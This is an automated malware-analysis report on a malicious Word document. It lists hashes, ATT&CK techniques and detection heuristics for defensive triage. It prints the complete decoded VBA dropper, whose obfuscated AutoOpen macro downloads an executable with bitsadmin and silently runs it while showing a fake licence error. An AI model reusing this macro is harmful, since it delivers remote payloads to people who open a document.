Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 10092b5e119838fa…

MALICIOUS

Office (OLE)

109.0 KB Created: 2017-05-09 08:23:00 First seen: 2018-01-23
MD5: 945b18add7252d7ba1472abc1f3f05eb SHA-1: bb7e4996e89a918a33b7455c376cae81c50befdf SHA-256: 10092b5e119838fab1c0b341e93fb803dc5e545047ffc21f99a3b8e291ae2280
262 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros with an AutoOpen function that calls Shell(), indicating it is designed to execute arbitrary code. The document body explicitly instructs the user to 'Enable editing' and 'Enable Content', a common lure for macro-based malware. The VBA script appears to be obfuscated but its primary function is to download and execute a second-stage payload, as evidenced by the Shell() call and the presence of embedded URLs.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6415578-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6415578-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/rights/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2477 bytes
SHA-256: e74ff023cfde481c7a0d284b30f58bada36a7335da2a01d61cbf509320501162
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Private Function DHUXPRRWUPBSKCV(IEDWVVYSSZSMOJU As String)
  DHUXPRRWUPBSKCV = MEBFBEWPKPAVCCXHFY(IEDWVVYSSZSMOJU, 3)
End Function
Private Function MEBFBEWPKPAVCCXHFY(ByVal EPHDEKEKSJZYB As String, ByVal EMKEVBEKVJDKKJMZGUXAEPR As Long) As String
    Dim KVKMSYSPTB As Long
    KVKMSYSPTB = Len(EPHDEKEKSJZYB)

    Dim XOJXHVKFHPSWLFPLNOVAI As String
    Dim SCBUAPGKFALCGZYWDH As Long
    Dim UEGSMDASYRKDPVMULEB As Long
    Dim ZXJR() As Long
    ReDim ZXJR(1 To KVKMSYSPTB)
    For UEGSMDASYRKDPVMULEB = 1 To KVKMSYSPTB
        SCBUAPGKFALCGZYWDH = Asc(Mid(EPHDEKEKSJZYB, UEGSMDASYRKDPVMULEB, 1))
        If SCBUAPGKFALCGZYWDH = 32 Then
            ZXJR(UEGSMDASYRKDPVMULEB) = SCBUAPGKFALCGZYWDH
        Else:
            SCBUAPGKFALCGZYWDH = SCBUAPGKFALCGZYWDH - EMKEVBEKVJDKKJMZGUXAEPR
            ZXJR(UEGSMDASYRKDPVMULEB) = SCBUAPGKFALCGZYWDH
        End If
        XOJXHVKFHPSWLFPLNOVAI = XOJXHVKFHPSWLFPLNOVAI & Chr(ZXJR(UEGSMDASYRKDPVMULEB))
    Next
    MEBFBEWPKPAVCCXHFY = XOJXHVKFHPSWLFPLNOVAI
End Function

Sub AutoOpen()
    Dim JLMDGLOJVDKSNRXZJ As String
    Dim ANVBJDVKOGWJURXXW As String
    JLMDGLOJVDKSNRXZJ = JLMDGLOJVDKSNRXZJ & DHUXPRRWUPBSKCV("fpg1h{h 2f %zdlwi") & DHUXPRRWUPBSKCV("ru 2w 8 \NHUT ) elwvdgplq") & DHUXPRRWUPBSKCV(" 2wudqvihu XNHI 2grzqordg") & DHUXPRRWUPBSKCV(" 2sulrulw| qr") & DHUXPRRWUPBSKCV("updo kwwsv=22") & DHUXPRRWUPBSKCV("zzz1gurser{1frp2")
    JLMDGLOJVDKSNRXZJ = JLMDGLOJVDKSNRXZJ & DHUXPRRWUPBSKCV("v2qkxhk;5is48rv3f24q") & DHUXPRRWUPBSKCV("hod|vhpphrkydexhyr}1") & DHUXPRRWUPBSKCV("h{hBgo@4 (dssgdwd(_yzuz{m1h{h") & DHUXPRRWUPBSKCV(" )vwduw") & DHUXPRRWUPBSKCV(" (dssgdwd(_yzuz{m1h{h%")

    ANVBJDVKOGWJURXXW = ANVBJDVKOGWJURXXW & DHUXPRRWUPBSKCV("Huuru 4<;:7= \rx pxvw kd") & DHUXPRRWUPBSKCV("yh Riilfh") & DHUXPRRWUPBSKCV(" Surihvvlrqd") & DHUXPRRWUPBSKCV("o Hglwlrq wr uhdg ") & DHUXPRRWUPBSKCV("wklv frqwhqw/ sohdv") & DHUXPRRWUPBSKCV("h xsjudgh |rxu olfhqf") & DHUXPRRWUPBSKCV("h1 Ylvlw zzz1plfurv")
    ANVBJDVKOGWJURXXW = ANVBJDVKOGWJURXXW & DHUXPRRWUPBSKCV("riw1frp iru khos")
    
    Shell JLMDGLOJVDKSNRXZJ, vbHide
    MsgBox ANVBJDVKOGWJURXXW
End Sub